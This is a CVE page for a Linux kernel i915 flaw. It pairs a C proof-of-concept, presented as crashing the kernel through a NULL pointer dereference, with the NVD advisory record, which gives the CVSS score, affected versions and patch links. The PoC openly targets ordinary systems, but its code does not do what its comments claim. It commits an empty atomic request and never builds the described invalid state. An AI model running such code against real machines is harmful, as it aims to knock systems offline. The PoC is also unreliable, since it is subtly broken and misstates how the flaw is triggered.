CVE-2023-53571

// PoC for CVE-2023-53571 - Linux kernel i915 NULL pointer dereference // This vulnerability triggers a kernel oops by causing a NULL pointer // dereference in intel_get_crtc_new_encoder() when the encoder is NULL. #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <drm/drm.h> #include <drm/drm_mode.h> #include <xf86drm.h> #include <xf86drmMode.h> int main(int argc, char **argv) { int fd; drmModeConnectorPtr connector; drmModeResPtr resources; drmModeAtomicReqPtr req; // Open the i915 DRM device fd = open("/dev/dri/card0", O_RDWR | O_CLOEXEC); if (fd < 0) { perror("Cannot open DRM device"); return 1; } // Get DRM resources resources = drmModeGetResources(fd); if (!resources) { perror("Cannot get DRM resources"); close(fd); return 1; } // Create an atomic mode setting request req = drmModeAtomicAlloc(); if (!req) { perror("Cannot allocate atomic request"); drmModeFreeResources(resources); close(fd); return 1; } // Attempt to trigger the vulnerability by performing an atomic commit // with an invalid CRTC/connector combination that causes encoder to be NULL // This triggers the WARN path in intel_get_crtc_new_encoder() // which then dereferences the NULL encoder->dev pointer printf("Attempting to trigger CVE-2023-53571...\n"); // Set a property on a connector to trigger atomic state processing if (resources->connectors[0]) { connector = drmModeGetConnector(fd, resources->connectors[0]); if (connector) { // Attempt atomic commit with state that will cause NULL encoder lookup int ret = drmModeAtomicCommit(fd, req, 0, NULL); printf("Atomic commit result: %d\n", ret); drmModeFreeConnector(connector); } } drmModeAtomicFree(req); drmModeFreeResources(resources); close(fd); return 0; }

{"cve": {"id": "CVE-2023-53571", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:52.690", "lastModified": "2026-03-21T01:05:56.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915: Make intel_get_crtc_new_encoder() less oopsy\n\nThe point of the WARN was to print something, not oops\nstraight up. Currently that is precisely what happens\nif we can't find the connector for the crtc in the atomic\nstate. Get the dev pointer from the atomic state instead\nof the potentially NULL encoder to avoid that.\n\n(cherry picked from commit 3b6692357f70498f617ea1b31a0378070a0acf1c)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.7", "versionEndExcluding": "5.10.180", "matchCriteriaId": "1931A552-26EB-46B9-9134-3AA72DF5002B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.111", "matchCriteriaId": "2B9DD776-7F17-4F72-B94F-54BFCBC692DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0fe6ef82e4f4764e8f556632e4cd93d78d448e99", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/54202488c835dab8c648acd107f0bb8eaa699894", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/631420b06597a33c72b6dcef78d1c2dea17f452d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/780f303233c35eeb5132e3ee1cbc8f4cebe86dd2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8cd725315c559a8a4d18ac1d7fce1d6b9a667529", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fd8b0abecdf66379e9d25d7448b942b5be379cb2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}